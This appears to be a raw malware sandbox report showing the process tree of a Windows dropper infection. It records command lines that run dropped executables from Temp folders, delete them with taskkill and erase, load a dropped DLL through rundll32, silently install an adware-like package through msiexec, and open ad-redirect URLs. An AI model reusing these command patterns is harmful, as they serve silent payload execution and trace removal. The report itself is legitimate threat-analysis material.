C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=18515139⤵PID:8144
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://www.directdexchange.com/jump/next.php?r=20872159⤵PID:9168
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.directdexchange.com/jump/next.php?r=42631199⤵PID:9024
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?id=12942319⤵PID:8316
-
-
-
C:\Users\Admin\AppData\Local\Temp\4b-8649c-0e3-576ad-e2548cb59a6a4\SHaesharityvi.exe"C:\Users\Admin\AppData\Local\Temp\4b-8649c-0e3-576ad-e2548cb59a6a4\SHaesharityvi.exe"8⤵
- Executes dropped EXE
PID:2032 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\s31z3zh0.qtn\GcleanerEU.exe /eufive & exit9⤵PID:3848
-
C:\Users\Admin\AppData\Local\Temp\s31z3zh0.qtn\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\s31z3zh0.qtn\GcleanerEU.exe /eufive10⤵PID:2672
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\s31z3zh0.qtn\GcleanerEU.exe" & exit11⤵PID:3764
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "GcleanerEU.exe" /f12⤵
- Kills process with taskkill
PID:3288
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\phmqdhkg.s1c\installer.exe /qn CAMPAIGN="654" & exit9⤵PID:3896
-
C:\Users\Admin\AppData\Local\Temp\phmqdhkg.s1c\installer.exeC:\Users\Admin\AppData\Local\Temp\phmqdhkg.s1c\installer.exe /qn CAMPAIGN="654"10⤵
- Executes dropped EXE
- Enumerates connected drives
- Modifies system certificate store
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of FindShellTrayWindow
PID:4012 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\phmqdhkg.s1c\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\phmqdhkg.s1c\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631171259 /qn CAMPAIGN=""654"" " CAMPAIGN="654"11⤵PID:3060
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vcgthvfe.gxz\anyname.exe & exit9⤵PID:1532
-
C:\Users\Admin\AppData\Local\Temp\vcgthvfe.gxz\anyname.exeC:\Users\Admin\AppData\Local\Temp\vcgthvfe.gxz\anyname.exe10⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:4080
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zh1mswxx.1it\gcleaner.exe /mixfive & exit9⤵PID:2692
-
C:\Users\Admin\AppData\Local\Temp\zh1mswxx.1it\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\zh1mswxx.1it\gcleaner.exe /mixfive10⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3220 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\zh1mswxx.1it\gcleaner.exe" & exit11⤵PID:2572
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "gcleaner.exe" /f12⤵
- Kills process with taskkill
PID:884
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\toc3ssco.3ut\autosubplayer.exe /S & exit9⤵PID:3812
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun05899db881f67fb29.exe4⤵
- Loads dropped DLL
PID:988 -
C:\Users\Admin\AppData\Local\Temp\7zS4E666104\Sun05899db881f67fb29.exeSun05899db881f67fb29.exe5⤵
- Executes dropped EXE
PID:1608
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun05fa3b4d2ae56e.exe /mixone4⤵
- Loads dropped DLL
PID:1744 -
C:\Users\Admin\AppData\Local\Temp\7zS4E666104\Sun05fa3b4d2ae56e.exeSun05fa3b4d2ae56e.exe /mixone5⤵
- Executes dropped EXE
PID:804 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Sun05fa3b4d2ae56e.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS4E666104\Sun05fa3b4d2ae56e.exe" & exit6⤵PID:2308
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Sun05fa3b4d2ae56e.exe" /f7⤵
- Kills process with taskkill
PID:1896
-
-
-
-
-
-
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Loads dropped DLL
PID:2404
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:2392
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:2296 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:792
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1549287278-484998404119712889-125821586715650769914061302221225997809-1917964162"1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2656
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:892
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "209144172610067494857576206914783018911645491111490414761418004789251361361"1⤵PID:2916
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:1256 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:1804
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
PID:3284 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding DC4289810E9FB24D5F24C7A1152E22D0 C2⤵PID:3788
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 85F5D4C14E33171554C0858CC2C01B8E2⤵
- Blocklisted process makes network request
PID:3324 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1780
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 34DEF1EA064991A5881505513CB6A7B5 M Global\MSI00002⤵PID:1812
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {DC7B2FED-DA36-4D6C-8033-86282D78BCB2} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:3896
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 80802⤵PID:2280
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 80802⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2672
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 80802⤵PID:4004
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 80802⤵PID:3544
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 80802⤵PID:3384
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 80802⤵PID:3232
-